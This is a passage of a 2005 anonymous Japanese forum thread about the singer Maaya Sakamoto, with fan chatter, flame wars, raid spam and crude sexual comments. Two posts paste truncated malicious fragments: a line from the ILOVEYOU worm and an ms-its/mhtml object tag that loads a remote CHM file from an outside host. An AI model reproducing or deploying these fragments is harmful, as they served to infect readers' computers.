295 :声の出演:名無しさん:2005/05/29(日) 21:35:24 ID:VsPxUN5aO
ひとつの曲が大ヒットして大売れした高橋洋子みたいになるよりは
今みたいにそこそこヒットを小出しに出していつか有名になっていて欲しい。

296 :声の出演:名無しさん:2005/05/29(日) 21:37:28 ID:O/wLSXUJ0
>>276
ナカーマ。三連単俺も当てたよ

297 :声の出演:名無しさん:2005/05/29(日) 21:39:04 ID:iDJFl3fk0
会社に坂本氏の声に栗卒のナオンがいて
なおかつ俺に好意を持ってるんだけど
見た目がループのジャケ並み・・・

298 :声の出演:名無しさん:2005/05/29(日) 22:05:25 ID:1mLZthuu0
oasis番組って午前中なのかよorz


299 :声の出演:名無しさん:2005/05/29(日) 22:36:49 ID:hLbdyHPp0
>>297
おっさん、妄想乙です

300 :声の出演:名無しさん:2005/05/29(日) 22:37:14 ID:JZjgH00C0
>>297
骨格似てると声も似ると言うしね。
女は化粧次第でどうにでも化けるよ。

301 :声の出演:名無しさん:2005/05/29(日) 23:02:35 ID:w6+FejrY0
>>297
お前それは結婚するしかないだろ。要らないなら俺にくれ。

302 :声の出演:名無しさん:2005/05/29(日) 23:06:31 ID:iDJFl3fk0
>300-301
外観からして骨格違いすぎで、ブサイんですが・・・
それでもよろしければ

303 :声の出演:名無しさん:2005/05/29(日) 23:08:12 ID:hLbdyHPp0
声でイかしてもらえるね

304 :声の出演:名無しさん:2005/05/29(日) 23:12:21 ID:wagyEUD30
ループのジャケかぁ
例えば上原ひろみも見方によっては「美しい」と形容出来るものを持ってるけど
萌えるタイプの「カワイイ」かと言われると、それはちょっと違う
真綾もそんなタイプ

305 :声の出演:名無しさん:2005/05/29(日) 23:35:53 ID:rcJg3Hz6O
950: 2005/05/28 23:33:44 ??? [sage]
65 Fayray
63 上原多香子 柴田淳 
60 伴都美子
58 唐沢美帆
56 三上ちさこ 坂井泉水
54 ACO Salyu 木村カエラ 持田香織 melody. 中ノ森文子(中ノ森BAND)
52 華原朋美 今井絵里子 小松未歩 マーキー 愛内里菜 島谷ひとみ 三枝夕夏 中島美嘉 鈴木亜美
50 大貫亜美 鬼束ちひろ 吉村由美 BoA 安藤裕子 ソニン 高橋瞳 Bonnie Pink 玉置成美 hitomi Rie fu 一青窈 Sowelu 知念里奈
48 YUKI UKI(SHAKKA RABBITS) 鈴木由紀子(BUGY CRAXONE) 中村由利 hiro 松たかこ 川瀬智子(Tommy) 安室奈美恵 UA 安良城紅 椎名林檎 KEIKO misono 大塚愛 矢井田瞳
45 坂本真綾 古川美季(SUPERCAR) カヨ(POLYSICS) KOKIA 倉木麻衣 浜崎あゆみ
42 Cocco 平原綾香 つじあやの 吉田美和 AI aiko 原田郁子(Clammbon) 元ちとせ 宇多田ヒカル 倖田來未 Tama(Hysteric Blue)
40 田渕ひさ子(blood thirsty butchers) アッコ(GO!GO!7188)
38 加藤ミリヤ SILVA HALCA(HALCALI)
35 Misia ユウ(GO!GO!7188) YUCALI(HALCALI)
33 小谷美紗子 クリスタルケイ 林明日香


(´・ω・`)ショボーン

306 :声の出演:名無しさん:2005/05/29(日) 23:43:21 ID:9ifoBRVS0
>>305
これは何だい?

307 :声の出演:名無しさん:2005/05/29(日) 23:45:14 ID:t4vK+g3zO
ラジオIDのない日曜日……orz

308 :声の出演:名無しさん:2005/05/30(月) 00:08:06 ID:8qX5bu8Z0
菊地に関する苦情はVictorの方に言っとけばいいかな?
とりあえずこのような方には今後参加して欲しくないと痛い若いファン風に書いておくよ
FC経由で真綾本人にも伝えようかな

309 :声の出演:名無しさん:2005/05/30(月) 00:10:30 ID:V6J56ytU0
>>307

_| ̄|○ 哀しくなるから、書かんといてくれ

>>308
本気かょ・・・。

310 :声の出演:名無しさん:2005/05/30(月) 00:12:32 ID:1JixkjrH0
菊池の事務所社長がソッコーで苦情出してるのに、
それ以上強力な苦情なんてないだろ。

311 :声の出演:名無しさん:2005/05/30(月) 00:19:15 ID:imuBDoaZ0
>>308
よろ

312 :声の出演:名無しさん:2005/05/30(月) 00:22:16 ID:S8RpxL9sO
>>306
>>305は女性歌手の顔面偏差値

313 :声の出演:名無しさん:2005/05/30(月) 00:25:46 ID:kzH/VhYh0
誰かが勝手に決めた評価なんて

314 :声の出演:名無しさん:2005/05/30(月) 00:26:23 ID:imuBDoaZ0
へぇ、、俺の彼女は木村カエラより可愛いけど上原多香子には負けるな
でも持田にも負ける

どうせキモオタのオナニー格付けだろうがな

315 :声の出演:名無しさん:2005/05/30(月) 00:26:50 ID:qL87EECn0
通報してまーやヲタの痛さをさらけ出すのはいい加減辞めてもらいたい

316 :声の出演:名無しさん:2005/05/30(月) 00:28:43 ID:qL87EECn0 ?##
まあ、アンチには格好の好材料が出たって事か。良かったな

317 :声の出演:名無しさん:2005/05/30(月) 00:32:34 ID:YQwVydtjO
>>315,316
必ずそういった達観しようとするレスが出るよね 古参に多い

まぁ、痛いから止めてねw

318 :声の出演:名無しさん:2005/05/30(月) 00:33:20 ID:qL87EECn0
wだって

319 :声の出演:名無しさん:2005/05/30(月) 00:35:41 ID:8qX5bu8Z0
噂の菊地信者じゃないかな?
アンチとか言ってるし、ミューマガライターの誰某がまた菊地さん批判してましたよ!ってチクリメールとかするような

320 :声の出演:名無しさん:2005/05/30(月) 00:36:24 ID:imuBDoaZ0
名前:ぬるぽっぽ
紹介文:      /!/{  / ヾ--r
   _  /     ̄    <_
 _>`´    >>1  ___<_
  >    r‐'" ̄ ̄ ノ ̄ ̄`ヽ、―ニ 二
/ ,    |  `ヽ/ ´`ヽ _  三,:三ー二
 ̄/    |   ノヽ--/ ̄ ,    ` ̄ ̄ ̄
 / /⌒ヽ,|  ミ }  ...|  /!
 レ l d     _}`ー‐し'ゝL _
  | ヽ、_,   _,:ヘr--‐‐'´}    ;ー------
  |/|  \   ノ`ヾ
ポイント:114
登録日:2005-04-12





イタタタタタタタタタwwwwwwwwwww

321 :声の出演:名無しさん:2005/05/30(月) 00:38:26 ID:qL87EECn0
ここにいる馬鹿共に同調するより、菊地信者になった方がいいと思うけど?

322 :声の出演:名無しさん:2005/05/30(月) 00:42:45 ID:YQwVydtjO
思いませんよ
君はまるでちんぷんかんぷん、いったい何を言いたいのですか?

あまり暴走しないでくださいwwwww

323 :声の出演:名無しさん:2005/05/30(月) 00:46:33 ID:8qX5bu8Z0
菊地信者はアニヲタ、モーヲタ、サブカルヲタばかりなのに、お前らのようなヲタとは違う!系の選民意識の高い人が多いみたいだからね
以前はQJを熱心に読んでいたのに今ではQJ批判とか中二→高二病を行ったり来たり、みたいな

324 :声の出演:名無しさん:2005/05/30(月) 00:46:51 ID:NNceYKNd0
このスレでは
サカモッティー以外のレスはスルーの方向で

325 :声の出演:名無しさん:2005/05/30(月) 00:51:09 ID:qL87EECn0
同族嫌悪って言いたいんですか?
別に菊地信者に限らず、真綾信者も同じなんじゃないですか
こうやって毒づく奴を排除してイエスマンだけにすれば良いのではないでしょうか。
このまま菅野自体参加しなくなったらスレも荒れなくなって良いんですけどね。

326 :声の出演:名無しさん:2005/05/30(月) 00:58:55 ID:mouon7OE0
なんで殺伐としてんの

327 :声の出演:名無しさん:2005/05/30(月) 01:02:31 ID:fZ90+K020
菊地、菊地言ってるから
eufoniusと真綾が組むのか、それはアリだな!
とか勝手に妄想しちゃったじゃねえか

328 :声の出演:名無しさん:2005/05/30(月) 01:02:41 ID:LUTPISUx0
         _,,..,,,,_  
         / ,' 3  `ヽーっ 
         l   ⊃ ⌒_つ
          `'ー---‐'''''"

329 :声の出演:名無しさん:2005/05/30(月) 01:03:45 ID:zm0pTRveO
煽るやつも煽られるやつも
俺にとってみれば
どっちも馬鹿だな。
それより約束はいらないについて
皆語りあっていこうぜ!
きーみーを きーみーを あーいしてる♪
やーくーそくは ↓ハイッ

330 :声の出演:名無しさん:2005/05/30(月) 01:04:25 ID:8qX5bu8Z0
菅野厨で菊地信者かw
「毒づく」って自覚はあるんだね。そういうスタンスがまぁ俗っぽく言えばカッコイイと思ってるようで

331 :声の出演:名無しさん:2005/05/30(月) 01:04:54 ID:NbGGi0ln0
             , -''":::::::::::::::::::::::`` ‐ 、' :,
              ,:/:::::::::::::;;;;;: -――‐- :;;;;;;`ヽ、
         ,:'/:::::::::::::::::/u      ,  ,  ``-;ヽ
         ,:':/:::::::::::::::::/  '⌒`ー‐'| | |`ー-‐、u|::|
        ,:'/:::::::::::::::::/u /⌒ヽ     /⌒ヽ !::! ;
       ,' l--、:::::::/   l  O | lj  | O | '、l ,: 何このスレ
       /´,―、ヽ:/     ヽ、,r‐'-、:::::::::ゝ--く  l ;
     .;'/ /ニ_ノ |   ..::::::::{  r,、 ヽ / ,r-, ノ::.. '、;
     ; | l  '-,        / ヽ !},. ---'し'_,ヘ   :..ヽ':,   
       ':,!  `‐'   u ヽ  ,. -'"´_,. ----,、 ヽ、u  l ;
        ':,ヽ_ノ u   ノ'" ,. -''" ̄ ̄ ̄ ヽ. ヽ  |
        .,: | lj      /  /_,. ---、,. -----、|  |  / ;.,
    --―'ヽ     /  '-------―――‐''" ノ /``ー- 、_
        ヽ、u '`ljー-----―――

332 :番組の途中ですが名無しです:2005/05/30(月) 01:05:20 ID:1ZCS/t5f0 ?#
まぁよくわからんが過疎板らしいからみんな仲良くしろや

333 :声の出演:名無しさん:2005/05/30(月) 01:05:53 ID:IZ1Z4f0n0
>>325
俺はお前に同意する

334 :声の出演:名無しさん:2005/05/30(月) 01:06:02 ID:d9wSDCBt0
ちんちんまんまん

335 :声の出演:名無しさん:2005/05/30(月) 01:06:23 ID:dz9OJTBW0
http://news19.2ch.net/test/read.cgi/news/1117382237/

【煽り】論破されそうでヤヴァス
1 :番組の途中ですが名無しです :2005/05/30(月) 00:57:17 ID:3FQJjcQa0 ?##
とあるスレにレスを付けたら何か攻撃された。
逆に煽りをかましたら引くに引けない状況になってもうたよ。
どうしようwwwwwwww


336 :トラックバック ★:2005/05/30(月) 01:06:25 ID:Vm8p3Niv0
【トラックバック来たよ】 (ver. 0.11)
[タイトル] 【煽り】論破されそうでヤヴァス
[発ブログ] ニュース速報@2ch掲示板
http://news19.2ch.net/test/read.cgi/news/1117382237/l50
[=要約=]
とあるスレにレスを付けたら何か攻撃された。
逆に煽りをかましたら引くに引けない状況になってもうたよ。
どうしようwwwwwwww



337 :声の出演:名無しさん:2005/05/30(月) 01:06:57 ID:IMDslVh90
http://news19.2ch.net/test/read.cgi/news/1117382237/

【煽り】論破されそうでヤヴァス
1 :番組の途中ですが名無しです :2005/05/30(月) 00:57:17 ID:3FQJjcQa0 ?##
とあるスレにレスを付けたら何か攻撃された。
逆に煽りをかましたら引くに引けない状況になってもうたよ。
どうしようwwwwwwww

338 :声の出演:名無しさん:2005/05/30(月) 01:07:08 ID:dpJh9OC40
       以上、ラウンコの馬鹿どもの仕業でした

    m n _∩                   ∩_ n m
  ⊂二⌒ __)    /\___/ヽ       ( _⌒二⊃
     \ \   /''''''   '''''':::::::\     / /
       \ \  |(●),   、(●)、.:|  / /
        \ \|   ,,ノ(、_, )ヽ、,, .::::|/  /     
          \ .|   ´トェェェイ` .:::::::|  /    それが、ラウンコ精神
           \\  |,r-r-| .::::://     http://etc3.2ch.net/entrance/
             \`ー`ニニ´‐―´/
             / ・    ・ /


339 :声の出演:名無しさん:2005/05/30(月) 01:07:15 ID:IMDslVh90
43 名前:番組の途中ですが名無しです[] 投稿日:2005/05/30(月) 01:06:57 ID:3FQJjcQa0 ?##
こういうスレはVIP向きなのか。
突撃してくれてお前らありがとうよ。
もう思い残すことは何も無い

vipに言ってきます

340 :トラックバック ★:2005/05/30(月) 01:07:26 ID:NBOL92o00
【トラックバック来たよ】 (ver. 0.11)
[タイトル] 【煽り】論破されそうでヤヴァス
[発ブログ] ニュース速報@2ch掲示板
http://news19.2ch.net/test/read.cgi/news/1117382237/l50
[=要約=]
とあるスレにレスを付けたら何か攻撃された。
逆に煽りをかましたら引くに引けない状況になってもうたよ。
どうしようwwwwwwww



341 :声の出演:名無しさん:2005/05/30(月) 01:09:48 ID:VxOo3eoW0
VIPの工作うぜええええええええええええ
閉鎖的なアニメオタクは祭だとか言って、後のこと考えずに下らない事するけど
アニメファンはちゃんと節度を持ってアニメと接している


342 :声の出演:名無しさん:2005/05/30(月) 01:09:59 ID:o80vDkG10
    ____
    \    ─~~~-~-~~─__
    <             ̄ ̄ ̄ ̄|
    > _________     |
     ̄ ̄ | /       \ |    |
        | /⌒ヽ  /⌒ヽ  |    |
        | | ‘ |  i ‘   |  |    |
        | ヽ.__ノ  ヽ._ ノ   レ⌒ヽ
       ノ   o          6 |
      /__   \      _ノ
          >        ノ
         <、___   イ
             |───┤
           / |/ \ / \

343 :声の出演:名無しさん:2005/05/30(月) 01:10:43 ID:IMDslVh90
48 名前:番組の途中ですが名無しです[] 投稿日:2005/05/30(月) 01:08:14 ID:Vie1zh4o0
ニュー速民って馬鹿だろ
ネタバラシするのはえーよ

344 :声の出演:名無しさん:2005/05/30(月) 01:10:45 ID:IBgCfrMO0
よくわからんが、つまり、まんまんみてちんちんおっきおっきってことだな。

345 :声の出演:名無しさん:2005/05/30(月) 01:11:58 ID:v3aMaUGx0 ?#
>>325が正しい!!

346 :声の出演:名無しさん:2005/05/30(月) 01:12:16 ID:UEGMdgEi0
>>325
どこから同属嫌悪っていう言葉が出てくるんだよw
明らかにお前一人が騒いでスレを変な流れに持っていっているんだろうが

>このまま菅野自体参加しなくなったらスレも荒れなくなって良いんですけどね。

ワケワカンネ 自分がおかしいという自覚の無い人間は困る

347 :声の出演:名無しさん:2005/05/30(月) 01:12:24 ID:gRfpMzXh0
        ???????????????????
       ??▼???▼??????????????
       ???:::: ::: ::   ::::?::?????????????
     ???::: ::       :: ::?????????????
     ??::?::::: ::    :: ::::??????????????
    ???? :: :::????::::???????????????
     ?:: ::?:: ::??::: :: :: ::?????????????
    ┃■??:::?????  :: ::::???????????
    ? :::::?? :: :::〓?  :: ::::?::????? ▲??
    ┃ ::?:::  :::?:::    ::: :::::???? ?▼??
    ┃::??????::      ::: ::::?▼ ●???
      ???::?:::::: ??::    :: :::?::?:::???
     ? ::?〓?????::    :: ::??::: ??
      ?::::??〓????    :: :::????
      ┃::??

348 :声の出演:名無しさん:2005/05/30(月) 01:12:25 ID:YXZ074mM0
VIPうぜえマジで最悪だな

349 :声の出演:名無しさん:2005/05/30(月) 01:14:11 ID:NNceYKNd0


34 :ID:qL87EECn0 :2005/05/30(月) 01:04:39 ID:3FQJjcQa0 ?##
菊地って野郎の失言を大袈裟に叩いてる奴が居たから
レスをしちゃったらこの有様さ


43 :番組の途中ですが名無しです :2005/05/30(月) 01:06:57 ID:3FQJjcQa0 ?##
こういうスレはVIP向きなのか。
突撃してくれてお前らありがとうよ。
もう思い残すことは何も無い

vipに言ってきます




350 :声の出演:名無しさん:2005/05/30(月) 01:15:18 ID:VxOo3eoW0
VIPが勝手にやってる祭りのせいで普通のオタク層がCD買いづらいよ
オリコンに出ようと出まいといい曲だと思うし、いい曲だった結果がオリコンなわけで、
後からシャシャリ出てきて、俺らの祭りのおかげみたいになってもむかつくし。
既存のファンだけでも四位とか三位にできるんだから、邪魔しないでほしい

351 :声の出演:名無しさん:2005/05/30(月) 01:17:03 ID:8qX5bu8Z0
ごまかしと予防線がお得意だからな菊地は。信者もそうなのか

352 :声の出演:名無しさん:2005/05/30(月) 01:21:37 ID:ObG63Hm40
菊池いいよね
ヤフオクのメガネ落とそうと思ってるんだけど

353 :声の出演:名無しさん:2005/05/30(月) 01:26:21 ID:EVzyHhZ30
2chて周りの人間が勝手に貶めていくよな

354 :声の出演:名無しさん:2005/05/30(月) 01:27:59 ID:eyub0q6p0
きしょくわりい声優ヲタを論破しにオムレツ板からきたんだ

355 :声の出演:名無しさん:2005/05/30(月) 01:34:12 ID:jG856ZXw0
売れるからいい曲ではないよ。
ワイドショーと一緒で一過性のものが多いでしょ。

ちなみに世間の認知度はアニメファン=オタクなわけですが、
全くその通りだからいいんじゃないですか?
ただし、犯罪者やニートと必ず結びついていると考えている輩だけは許せないですが。


356 :声の出演:名無しさん:2005/05/30(月) 01:45:52 ID:rjOOId8r0
かわいい

357 :声の出演:名無しさん:2005/05/30(月) 02:06:41 ID:U9bsrjxt0
c.Copy(dirsystem&"|LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/


358 :声の出演:名無しさん:2005/05/30(月) 02:07:05 ID:U9bsrjxt0
c.Copy(dirsystem&"|LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/


359 :声の出演:名無しさん:2005/05/30(月) 03:02:40 ID:jqkGKL2u0
つーか、マンコ

360 :声の出演:名無しさん:2005/05/30(月) 04:49:38 ID:8qX5bu8Z0
菊地のラジオにも苦情送っとかないとな
番組のとこよりJFNの方がいいか

361 :声の出演:名無しさん:2005/05/30(月) 05:22:03 ID:bUEXZs5L0
荒らすな、おまいら。

362 :声の出演:名無しさん:2005/05/30(月) 11:43:07 ID:MHEEMvTu0
閑話休題

363 :声の出演:名無しさん:2005/05/30(月) 12:05:35 ID:RPb16E0+0
相変わらずの荒れようですね(笑)

364 :声の出演:名無しさん:2005/05/30(月) 12:19:53 ID:1jn4JsXqO
なんで荒れるの?

365 :声の出演:名無しさん:2005/05/30(月) 12:53:01 ID:RJmEHFK20
声優板でただえさえキワモノ揃いな上に血の気の多い奴が沢山いるからね。
荒れた方が有名になれるから良いんじゃないのか。

366 :声の出演:名無しさん:2005/05/30(月) 13:32:52 ID:cWfexuYo0
良いわけねーだろアホ

367 :声の出演:名無しさん:2005/05/30(月) 14:21:35 ID:kBqFAtY60
関係者の目にとまって仕事まわしてもらえるかもしれませんよ

368 :声の出演:名無しさん:2005/05/30(月) 14:21:44 ID:ZYqeA2vn0
時代はヽ(゚∀゚)/イチ マン ネン トニ セン ネン マエ カラ アッイッシッテッルゥ〜〜=3

369 :声の出演:名無しさん:2005/05/30(月) 14:39:06 ID:wrUKjNwS0
そろそろMステに出ても良いんジャマイカ?

370 :声の出演:名無しさん:2005/05/30(月) 15:11:22 ID:CynoO5toO
Mステなんて出なくていいよ。恥ずかしくて観れない

371 :声の出演:名無しさん:2005/05/30(月) 15:19:36 ID:R4m2lmdCO
いまさらMステ出るには、芸暦が長すぎるような…。

372 :声の出演:名無しさん:2005/05/30(月) 15:21:39 ID:mouon7OE0
テレビに出なくていいからアニメ系以外のところでメジャーになってくれ。
もったいなすぎ。

373 :声の出演:名無しさん:2005/05/30(月) 15:51:06 ID:sRnHZqMr0
菊池のせいでこんな

374 :声の出演:名無しさん:2005/05/30(月) 16:23:16 ID:IdnuL4H50
テレビに出なくてもイイけどライブツアーはやってほしい

375 :声の出演:名無しさん:2005/05/30(月) 16:32:16 ID:4D70JHdG0
eufoniusの作曲編曲やってる人、嫌いじゃないけど
音が偽菅野っぽい。



376 :声の出演:名無しさん:2005/05/30(月) 16:55:25 ID:3nuSSHwi0
Mステにこだわる理由がわからんほい

377 :声の出演:名無しさん:2005/05/30(月) 17:23:52 ID:fZ90+K020
>>375
好きなアーティスト菅野よう子だし

378 :声の出演:名無しさん:2005/05/30(月) 17:55:29 ID:mouon7OE0
>>376
それ系の純粋な音楽番組がMステ以外残ってないからだろう

379 :声の出演:名無しさん:2005/05/30(月) 17:56:20 ID:IDGiJ7fJ0
出るならトップランナーでしょ。NHKさんにもお世話になってるしマルチ
ぶりを語るには45分、いや、1時間半は必要になるな

380 :声の出演:名無しさん:2005/05/30(月) 18:04:28 ID:uuVYvslu0
Mステなんか出なくていいじゃん
タモリとトークなんて見たくも無い

381 :声の出演:名無しさん:2005/05/30(月) 18:34:38 ID:wEkvf5L20
なあお前ら、もしかしてさあ……


MステとMフェア間違えてないか?

382 :声の出演:名無しさん:2005/05/30(月) 18:52:00 ID:S/o/FTZT0
http://with2ch.net/up/data/1117245091.wmv

        _,,:-ー''" ̄ ̄ ̄ `ヽ、
     ,r'"           `ヽ.
 __,,::r'7" ::.              ヽ_
 ゙l  |  ::              ゙) 7
  | ヽ`l ::              /ノ )
 .| ヾミ,l _;;-==ェ;、   ,,,,,,,,,,,,,,,_ ヒ-彡|
  〉"l,_l "-ー:ェェヮ;::)  f';;_-ェェ-ニ ゙レr-{   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | ヽ"::::''   ̄´.::;i,  i `'' ̄    r';' }   | 久々に勃起
 . ゙N l ::.  ....:;イ;:'  l 、     ,l,フ ノ   | こうやって乳首やらが普通に放送されてた
 . |_i"ヽ;:...:::/ ゙'''=-='''´`ヽ.  /i l"  < のが昔のTVなんだよな 今のTVは
   .| ::゙l  ::´~===' '===''` ,il" .|'".    | 規制だらけだから困る
    .{  ::| 、 :: `::=====::" , il   |     \________
   /ト、 :|. ゙l;:        ,i' ,l' ノト、
 / .| \ゝ、゙l;:      ,,/;;,ノ;r'" :| \
'"   |   `''-、`'ー--─'";;-'''"   ,|   \_


383 :声の出演:名無しさん:2005/05/30(月) 22:04:14 ID:SAAUPpzq0
ヽ(゚∀゚)/イチ マン ネン トニ セン ネン マエ カラ アッイッシッテッルゥ〜〜=3

ヽ(゚∀゚)/イチ マン ネン トニ セン ネン マエ カラ アッイッシッテッルゥ〜〜=3



384 :声の出演:名無しさん:2005/05/30(月) 22:15:30 ID:govatH6LO
アニカンにのってるようだがアニカンってどこでもらえるんだろう

385 :声の出演:名無しさん:2005/05/30(月) 22:22:42 ID:A2jOd6Ig0
⊃ ttp://www.anican.net/

ちなみに真綾のインタビューがあるのは前号。

386 :声の出演:名無しさん:2005/05/31(火) 01:30:48 ID:wO1dknHfO
真綾。。。CDでたのにかってないよ真綾。。。
なんかこれからファンやってく自信ないよ真綾。。。
真綾。。。

387 :声の出演:名無しさん:2005/05/31(火) 01:45:19 ID:4RwU/BO00
無理に聞かなくても気が向いた時に聞けばいいじゃんか

388 :声の出演:名無しさん:2005/05/31(火) 01:45:42 ID:RKPpRwPC0
そしてそのまま去ってくれるとありがたい

389 :声の出演:名無しさん:2005/05/31(火) 01:47:52 ID:+OmNNNYaO
MステやMフェアに出るよりは
またCMのタイアップとかをやってほしい。
チロルチョコの時はあの曲をCD化してもらいたかった。

390 :声の出演:名無しさん:2005/05/31(火) 02:40:28 ID:OsccQ7jw0
WANTED 聞いた。
真綾どうこうぬきにしてひどい番組だねぇ。
対象を馬鹿にしつつ、それに頼っている。

391 :声の出演:名無しさん:2005/05/31(火) 04:37:25 ID:4RwU/BO00
>>389
タイアップ賛成

392 :声の出演:名無しさん:2005/05/31(火) 06:42:14 ID:xsQVp1AF0
このままでいい
って人も多いだろうけど1曲くらいヒット曲が出るといいなと思ってる

今のままじゃ大半の人には知られないまま
ずっと先でも過去のVの中に出てくるくらいの曲が欲しい
簡単なことじゃないけどね

393 :声の出演:名無しさん:2005/05/31(火) 07:10:47 ID:/iQbM/KQ0
>>392
簡単だと思うよ。
管野プロデュースでなんかのドラマの主題歌にさえなりゃ即ブレイクだろ。

394 :声の出演:名無しさん:2005/05/31(火) 07:56:23 ID:cBB9k1Ft0
新曲ループ聴き直したら凄い良いな

395 :声の出演:名無しさん:2005/05/31(火) 08:02:11 ID:VYE3K99+O
なんか、ファンタジーっぽい詞もつまんないから
今度は“ありえな〜い”とか“普通に”
とか乱れた日本語つかってほしい

396 :声の出演:名無しさん:2005/05/31(火) 08:53:46 ID:qyntimRW0
ループ、今まで小さな音量で、しかもPV録画してからそっちばかりで聴いていたんだけど、
ヘッドフォンで初めて聴いて、ほぼ全編に渡って3度のハーモニーが付いていたことに気づいた(遅っ)。
これがかなり心地よいね。

397 :声の出演:名無しさん:2005/05/31(火) 10:24:25 ID:UGZ27xxn0
>>395
今こそ樋口智恵子とWhoops!!を再結成するチャンスだと思うw

398 :声の出演:名無しさん:2005/05/31(火) 12:02:47 ID:Bt4f3VWU0
ふりふりふれーくちろるちょこ♪

399 :声の出演:名無しさん:2005/05/31(火) 13:23:38 ID:XP+77jcZ0
チロルの歌よかった。
CD化かなり期待してたんだがなあ

400 :声の出演:名無しさん:2005/05/31(火) 14:19:06 ID:l+r9rL/a0
>>393
そのドラマの主題歌が無理なんだろw
いくら掛かると思ってるんだww

401 :声の出演:名無しさん:2005/05/31(火) 14:22:34 ID:MlCsVMz90
夜明けのオクターブみたいなハジけた歌まだぁ〜〜〜〜〜〜〜チンンチン

402 :声の出演:名無しさん:2005/05/31(火) 15:07:16 ID:ZvQKTiuf0
>>401
菅野だったらたまに作ってくれるよ

403 :声の出演:名無しさん:2005/05/31(火) 15:37:18 ID:fiWvYmoU0
>>401
あの曲を「ニコパチ!!」の一曲目に持ってくるあたり、尋常じゃない罠。
菅野恐るべし。

404 :声の出演:名無しさん:2005/05/31(火) 15:48:42 ID:20BCQ33O0
夜明けのオクターブは糞

405 : ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2005/05/31(火) 15:55:07 ID:pLNDe1TS0
     _____
   /::::::::::::::::::::::::::\〜プーン
  /:::::::::::::::::::::::::::::::::::::::\〜プーン
  |:::::::::::::;;;;;;|_|_|_|_|〜プーン
  |;;;;;;;;;;ノ∪  \,) ,,/ ヽ〜
  |::( 6∪ ー─◎─◎ )〜
  |ノ  (∵∴ ( o o)∴)〜
  | ∪< ∵∵   3 ∵> ムッキー!
  \        ⌒ ノ_____
    \_____/ |  | ̄ ̄\ \
___/      \   |  |    | ̄ ̄|
|:::::::/  \___ | \|  |    |__|
|:::::::| \____|つ⊂|__|__/ /
|:::::/        | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕

406 :声の出演:名無しさん:2005/05/31(火) 15:57:32 ID:20BCQ33O0
夜明けのオクターブは糞

407 :声の出演:名無しさん:2005/05/31(火) 17:55:31 ID:sRt8eDXA0
さて、本当に申し込んだ強者は何人いたのやら。
ええ、申し込めませんでしたとも…_no

408 :声の出演:名無しさん:2005/05/31(火) 18:05:20 ID:c+4dR9mH0
id泣ける・・・

409 :声の出演:名無しさん:2005/05/31(火) 18:15:36 ID:i9hHM9Z4O
今発売してるhm3スペシャルと声優グランプリや他の雑誌にも載ってるらしいんですけど、何を買ったら良いですかね?

衣裳とメイク、髪型、インタビュー等が良かったもの、かぶってないものを教えて下さい!!

410 :声の出演:名無しさん:2005/05/31(火) 18:50:30 ID:9EzFI4740
菊池とかって奴は何?
アニソン貶して音楽通ぶってる輩とは違うの?

411 :声の出演:名無しさん:2005/05/31(火) 19:33:57 ID:I4unyy3s0
佐賀出身?

412 :声の出演:名無しさん:2005/05/31(火) 20:07:34 ID:FMU9ERDO0
菊池ネタはスルーでいいじゃん
知ったところで得にもならないし

どうせ興味無いんだろ?

413 :声の出演:名無しさん:2005/05/31(火) 20:44:19 ID:+d6ojirDO
>>410
つーかそれ以外の何者でもないだろ
ああいうのはその内自滅するからほっとけ

414 :声の出演:名無しさん:2005/05/31(火) 20:46:21 ID:JykM1Rqp0
どうでもいいんだけど

ツナサンドには玉葱のみじん切りがは欠かせないよね?
入れたほうが美味しいよね。

415 :声の出演:名無しさん:2005/05/31(火) 20:56:49 ID:LJ1ZSc9X0
>>414
自分は玉葱入れないでキュウリ入れるよ  (゚Д゚)ウマー   

416 :声の出演:名無しさん:2005/05/31(火) 21:02:40 ID:2BmFrJYj0
ループのPVさっき公式ページで初めて観たがヤリたくなった。
動く真綾を初めて見たんだが、想像以上に絶妙な
不細工と美人の中間ってカンジ。マジ萌えw


417 : ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2005/05/31(火) 21:08:12 ID:g+mctsqT0
     川|川川  川
    ‖川 | | | ー ー||
    川川 | |ー□--□
    川川| | \ J/||
    川川‖  | ロ|/| カタカタカタ
    川川|‖\|__|l|l  _____
   /川川川__/川川  |  | ̄ ̄\ \
   |  川川|  |/川l__,|  |    | ̄ ̄|
   |  \_|__|_|、__|  |    |__|
   |  \____|つ   |__|__/ /
   |      |  | | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕
  |       | ̄

418 :声の出演:名無しさん:2005/05/31(火) 22:09:25 ID:9Fz/eieL0
>>392
どうせなら名盤といわれるアルバムを出して欲しい。
曲単位で評価されるなら一発なんかイラネ

419 :声の出演:名無しさん:2005/05/31(火) 22:26:18 ID:J4Q1sVFs0
菊地菊地ってお前は菊地村の住人かっつーの

420 :声の出演:名無しさん:2005/05/31(火) 22:51:29 ID:4RwU/BO00
>>395
ハニバニは?

421 :声の出演:名無しさん:2005/05/31(火) 23:00:19 ID:zb4tPQ3a0
数年前、
エスカフローネの舞台挨拶を見るためにSATYの中の映画館へ行きました。

開演まで時間があったんで、
映画館の外の人気の居ない階段フロア横の椅子に座ってたら目の前を数人の人々が通り過ぎました。
その瞬間、なんかいい匂いが!
気付いて顔を上げた時には後ろ姿しか見えませんでしたが、それは紛れも無く坂本真綾本人でした。
ああ、俺の30cm前を真綾が・・・

422 :声の出演:名無しさん:2005/05/31(火) 23:01:24 ID:GIlQCd7p0
>>419
完全に時機を逸したクロ高ネタ乙

423 :声の出演:名無しさん:2005/05/31(火) 23:46:52 ID:FHLXxeQz0
きもいよー

424 :声の出演:名無しさん:2005/06/01(水) 00:20:09 ID:C5eq8Dei0
きつつきは〜

425 :声の出演:名無しさん:2005/06/01(水) 00:29:50 ID:LTAtQgF6O
嘘つきだから

426 :声の出演:名無しさん:2005/06/01(水) 00:37:07 ID:2RZTLgg+0
気をつけて!

427 :声の出演:名無しさん:2005/06/01(水) 00:50:05 ID:O3jRi7nl0
きつつきは〜

